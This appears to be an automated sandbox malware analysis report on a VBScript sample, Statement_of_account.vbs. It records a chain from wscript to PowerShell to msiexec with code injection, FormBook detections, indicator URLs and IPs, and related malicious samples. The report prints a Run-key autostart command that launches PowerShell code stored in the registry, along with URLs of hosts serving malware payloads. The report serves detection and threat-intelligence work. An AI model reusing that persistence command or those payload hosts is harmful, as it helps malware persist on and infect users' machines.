              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000008.00000002.2098902399.000000001FA80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 00000008.00000002.2098902399.000000001FA80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information321
              Scripting
              Valid Accounts1
              Windows Management Instrumentation
              321
              Scripting
              411
              Process Injection
              1
              Masquerading
              OS Credential Dumping121
              Security Software Discovery
              Remote Services1
              Archive Collected Data
              11
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter
              1
              Registry Run Keys / Startup Folder
              1
              Registry Run Keys / Startup Folder
              1
              Modify Registry
              LSASS Memory1
              Process Discovery
              Remote Desktop ProtocolData from Removable Media1
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              131
              Virtualization/Sandbox Evasion
              Security Account Manager131
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive2
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell
              Login HookLogin Hook411
              Process Injection
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture13
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Deobfuscate/Decode Files or Information
              LSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information
              Cached Domain Credentials13
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Software Packing
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557901 Sample: Statement_of_account.vbs Startdate: 18/11/2024 Architecture: WINDOWS Score: 100 30 heavyequipmentsales.au 2->30 34 Malicious sample detected (through community Yara rule) 2->34 36 Antivirus detection for URL or domain 2->36 38 Yara detected FormBook 2->38 40 6 other signatures 2->40 9 powershell.exe 17 2->9         started        12 wscript.exe 1 2->12         started        signatures3 process4 signatures5 42 Early bird code injection technique detected 9->42 44 Writes to foreign memory regions 9->44 46 Found suspicious powershell code related to unpacking or dynamic code loading 9->46 56 2 other signatures 9->56 14 msiexec.exe 2 7 9->14         started        17 conhost.exe 9->17         started        48 VBScript performs obfuscated calls to suspicious functions 12->48 50 Suspicious powershell command line found 12->50 52 Wscript starts Powershell (via cmd or directly) 12->52 54 Suspicious execution chain found 12->54 19 powershell.exe 14 18 12->19         started        process6 dnsIp7 58 Maps a DLL or memory area into another process 14->58 60 Hides threads from debuggers 14->60 22 cmd.exe 1 14->22         started        32 heavyequipmentsales.au 203.170.87.17, 443, 49473, 49480 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 19->32 62 Found suspicious powershell code related to unpacking or dynamic code loading 19->62 24 conhost.exe 19->24         started        signatures8 process9 process10 26 conhost.exe 22->26         started        28 reg.exe 1 1 22->28         started       

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Statement_of_account.vbs0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://heavyequipmentsales.au/admin/Verdensalt.asi100%Avira URL Cloudphishing
              https://heavyequipmentsales.au/J100%Avira URL Cloudphishing
              https://heavyequipmentsales.au/admin/bmFpLgqmXzovv105.binM100%Avira URL Cloudphishing
              https://heavyequipmentsales.au/admin/bmFpLgqmXzovv105.bind100%Avira URL Cloudphishing
              https://heavyequipmentsales.au100%Avira URL Cloudphishing
              http://heavyequipmentsales.au100%Avira URL Cloudphishing
              https://heavyequipmentsales.au/admin/bmFpLgqmXzovv105.binSpissResqp.lqaebo2.ru.com/admin/bmFpLgqmXzo100%Avira URL Cloudphishing
              https://heavyequipmentsales.au/admin/bmFpLgqmXzovv105.bins100%Avira URL Cloudphishing
              https://qp.lqaebo2.ru.com/admin/Verdensalt.asi0%Avira URL Cloudsafe
              https://heavyequipmentsales.au/admin/bmFpLgqmXzovv105.bin100%Avira URL Cloudphishing
              http://crl.micro20%Avira URL Cloudsafe
              https://heavyequipmentsales.au/100%Avira URL Cloudphishing
              https://qp.lqaebo2.ru.com/admin/Verdensalt0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              bg.microsoft.map.fastly.net
              199.232.214.172
              truefalse
                high
                heavyequipmentsales.au
                203.170.87.17
                truefalse
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://heavyequipmentsales.au/admin/Verdensalt.asifalse
                  • Avira URL Cloud: phishing
                  unknown
                  https://heavyequipmentsales.au/admin/bmFpLgqmXzovv105.binfalse
                  • Avira URL Cloud: phishing
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1872749558.000001F59006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987552917.0000000005D17000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1963659516.0000000004E08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1995087687.0000000007650000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1963659516.0000000004E08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1995087687.0000000007650000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://go.micropowershell.exe, 00000001.00000002.1845657485.000001F580BD1000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://heavyequipmentsales.au/admin/bmFpLgqmXzovv105.binSpissResqp.lqaebo2.ru.com/admin/bmFpLgqmXzomsiexec.exe, 00000008.00000002.2098530804.000000001F6E0000.00000004.00001000.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          unknown
                          https://heavyequipmentsales.au/admin/bmFpLgqmXzovv105.bindmsiexec.exe, 00000008.00000002.2079306756.0000000002AEF000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: phishing
                          unknown
                          https://contoso.com/Licensepowershell.exe, 00000003.00000002.1987552917.0000000005D17000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://heavyequipmentsales.au/Jmsiexec.exe, 00000008.00000002.2079306756.0000000002AEF000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: phishing
                            unknown
                            https://contoso.com/Iconpowershell.exe, 00000003.00000002.1987552917.0000000005D17000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://heavyequipmentsales.aupowershell.exe, 00000001.00000002.1845657485.000001F580227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845657485.000001F581A44000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: phishing
                              unknown
                              https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1963659516.0000000004E08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1995087687.0000000007650000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://heavyequipmentsales.au/admin/bmFpLgqmXzovv105.binMmsiexec.exe, 00000008.00000002.2079306756.0000000002AB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: phishing
                                unknown
                                http://heavyequipmentsales.aupowershell.exe, 00000001.00000002.1845657485.000001F581D92000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: phishing
                                unknown
                                https://aka.ms/pscore6lBfqpowershell.exe, 00000003.00000002.1963659516.0000000004CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://contoso.com/powershell.exe, 00000003.00000002.1987552917.0000000005D17000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1872749558.000001F59006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1987552917.0000000005D17000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://qp.lqaebo2.ru.com/admin/Verdensalt.asipowershell.exe, 00000001.00000002.1845657485.000001F580227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1845657485.000001F5815D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1963659516.0000000004E08000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://aka.ms/pscore68powershell.exe, 00000001.00000002.1845657485.000001F580001000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1845657485.000001F580001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1963659516.0000000004CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://heavyequipmentsales.au/admin/bmFpLgqmXzovv105.binsmsiexec.exe, 00000008.00000002.2079306756.0000000002AB3000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: phishing
                                          unknown
                                          http://crl.micro2powershell.exe, 00000003.00000002.1995087687.000000000766D000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://heavyequipmentsales.au/msiexec.exe, 00000008.00000002.2079306756.0000000002AEF000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: phishing
                                          unknown
                                          https://qp.lqaebo2.ru.com/admin/Verdensaltpowershell.exe, 00000003.00000002.1963659516.0000000004E08000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          203.170.87.17
                                          heavyequipmentsales.auAustralia
                                          38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUfalse
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1557901
                                          Start date and time:2024-11-18 18:11:10 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 8m 7s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:13
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:Statement_of_account.vbs
                                          Detection:MAL
                                          Classification:mal100.troj.expl.evad.winVBS@13/8@2/1
                                          EGA Information:
                                          • Successful, ratio: 33.3%
                                          HCA Information:
                                          • Successful, ratio: 82%
                                          • Number of executed functions: 65
                                          • Number of non-executed functions: 254
                                          Cookbook Comments:
                                          • Found application associated with file extension: .vbs
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded IPs from analysis (whitelisted): 199.232.214.172
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target powershell.exe, PID 3488 because it is empty
                                          • Execution Graph export aborted for target powershell.exe, PID 6776 because it is empty
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: Statement_of_account.vbs
                                          TimeTypeDescription
                                          12:12:02API Interceptor1x Sleep call for process: wscript.exe modified
                                          12:12:05API Interceptor88x Sleep call for process: powershell.exe modified
                                          12:12:39API Interceptor3x Sleep call for process: msiexec.exe modified
                                          17:12:37AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Socialpolitikken %valgdagen% -windowstyle 1 $Undertakerish=(gp -Path 'HKCU:\Software\Nutrias\').Esponton;%valgdagen% ($Undertakerish)
                                          17:12:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Socialpolitikken %valgdagen% -windowstyle 1 $Undertakerish=(gp -Path 'HKCU:\Software\Nutrias\').Esponton;%valgdagen% ($Undertakerish)
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          203.170.87.17http://share581680880819.mycls.com.au/109533386504871408407795xbixgen-pgx-211995313699-ifxcvittoria-isxbgcg.orgsf-1038183551929Get hashmaliciousUnknownBrowse
                                          • share581680880819.mycls.com.au/favicon.ico
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          bg.microsoft.map.fastly.netDRP130636747.pdfGet hashmaliciousUnknownBrowse
                                          • 199.232.214.172
                                          gP5rh6fa0S.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                          • 199.232.214.172
                                          DRP12938938166_PDF.jsGet hashmaliciousUnknownBrowse
                                          • 199.232.214.172
                                          Discord_updater_rCURRENT.exeGet hashmaliciousUnknownBrowse
                                          • 199.232.210.172
                                          https://deina.kinsta.cloud/wp-content/upgrade/ddprojetGet hashmaliciousUnknownBrowse
                                          • 199.232.214.172
                                          emes.batGet hashmaliciousUnknownBrowse
                                          • 199.232.210.172
                                          KKXT7bY8bG.exeGet hashmaliciousUnknownBrowse
                                          • 199.232.210.172
                                          new.batGet hashmaliciousUnknownBrowse
                                          • 199.232.214.172
                                          file.exeGet hashmaliciousCredential FlusherBrowse
                                          • 199.232.210.172
                                          Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                          • 199.232.214.172
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUhttps://www.google.ml/url?fvg=1YI3fC8whlGPBCiMyiuQ&bhtBf=8EQhXbuMThqowIo0zyCX&sa=t&ndg=afydNw3nDHf9A6uq2MCH&url=amp%2Fiestpcanipaco.edu.pe%2F.r%2Fu1kOgE-SURELILYYWRhcnNoLm1hbGhvdHJhQGphdG8uY29tGet hashmaliciousHTMLPhisherBrowse
                                          • 163.47.73.97
                                          https://go.skimresources.com/?id=129857X1600501&url=https%3A%2F%2Fys-law-firm.jimdosite.comGet hashmaliciousHTMLPhisherBrowse
                                          • 122.201.80.182
                                          https://www.primechoicefinance.com.au/dykjj.php?7096797967704b53693230746450797938717a5330754c4530737a736a58533837503155744a31533870547662544277413dYnJhc3dlbGxzQGhlbGVuYWluZHVzdHJpZXMuY29tGet hashmaliciousHTMLPhisherBrowse
                                          • 122.201.80.182
                                          https://www.google.lu/url?q=dK5oN8bP2yJ1vL3qF6gT0cR9mW4sH7jD2uY8kX5zM0nW4rT9pB6yG3lF1oJ8qV2kN7dP5uC3xH6tR0jL4wY1vS9mD2bT8nK7yX5rJ3qG0sW6lP9oF2aH1kpQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&esrc=026rlFgECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=XpPkDfJ6CHARlDJVS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%E2%80%8Bgalapagos%C2%ADhostal%C2%AD%C2%ADtintorera%C2%AD.com%2Fauoth%2Fmeme%2Fnexpoint.com/c2pvaG5zb25AbmV4cG9pbnQuY29tGet hashmaliciousMamba2FABrowse
                                          • 27.54.88.98
                                          https://www.cognitoforms.com/f/wAh1CzXrnEmEifrmJ4OEgg/1Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                          • 27.54.88.98
                                          yakuza.i686.elfGet hashmaliciousUnknownBrowse
                                          • 103.226.223.159
                                          Ageeconstruction -_(BENEFIT INSTRUCTIONS)_.docxGet hashmaliciousMamba2FABrowse
                                          • 203.170.84.122
                                          Ageeconstruction -_(BENEFIT INSTRUCTIONS)_.docxGet hashmaliciousMamba2FABrowse
                                          • 203.170.84.122
                                          H#4051-5353.vbsGet hashmaliciousAsyncRATBrowse
                                          • 122.201.127.73
                                          http://chwcs91azo1jf8f6b6acu6sf7da7lxazxwg6fo8epa.sbxaccountants.com.au/Get hashmaliciousCaptcha PhishBrowse
                                          • 203.170.87.121
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          3b5074b1b5d032e5620f69f9f700ff0eQUOTATION_NOVQTRA071244PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                          • 203.170.87.17
                                          NoteID [4962398] _Secure_Document_Mrettinger-46568.docxGet hashmaliciousHTMLPhisherBrowse
                                          • 203.170.87.17
                                          DRP130636747.pdfGet hashmaliciousUnknownBrowse
                                          • 203.170.87.17
                                          seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                          • 203.170.87.17
                                          z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                          • 203.170.87.17
                                          Order88983273293729387293828PDF.exeGet hashmaliciousQuasarBrowse
                                          • 203.170.87.17
                                          https://www.figma.com/files/team/1440352672505295724/recents-and-sharing?fuid=1440352668792061854Get hashmaliciousUnknownBrowse
                                          • 203.170.87.17
                                          https://www.google.co.th/url?q=sf_rand_string_uppercase(33)uQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%20xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%62%65%73%74%73%63%72%65%65%6E%69%6E%67%73%65%72%76%69%63%65%2E%63%6F%6D%2F%77%69%6E%6E%6D%2F%6B%6F%6C%69%6E%6E%2F%6B%6F%6F%6C%2Ftest@gmail.comGet hashmaliciousUnknownBrowse
                                          • 203.170.87.17
                                          https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/kovitz.net%2Fyvbw%2F9424537096/ZGViQG1hcnRpbmpveWNlLmNvbQ==Get hashmaliciousUnknownBrowse
                                          • 203.170.87.17
                                          Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 203.170.87.17
                                          37f463bf4616ecd445d4a1937da06e19gP5rh6fa0S.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                          • 203.170.87.17
                                          Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 203.170.87.17
                                          urkOkB0BdX.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                          • 203.170.87.17
                                          8F0oMWUhg7.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                          • 203.170.87.17
                                          P6uSqL3TTL.exeGet hashmaliciousGhostRat, Mimikatz, NitolBrowse
                                          • 203.170.87.17
                                          Factura Honorarios 2024-11-17.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 203.170.87.17
                                          JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                          • 203.170.87.17
                                          Richiesta Proposta (MACHINES ITALIA) 18-11-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                          • 203.170.87.17
                                          Unlock_Tool_v2.6.5.exeGet hashmaliciousStealc, VidarBrowse
                                          • 203.170.87.17
                                          DHL_Shipping_Invoices_Awb_BL_000000000111820242247820020031808174Global180030011182024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                          • 203.170.87.17
                                          No context
                                          Process:C:\Windows\System32\wscript.exe
                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                          Category:dropped
                                          Size (bytes):71954
                                          Entropy (8bit):7.996617769952133
                                          Encrypted:true
                                          SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                          MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                          SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                          SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                          SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                          Malicious:false
                                          Reputation:high, very likely benign file
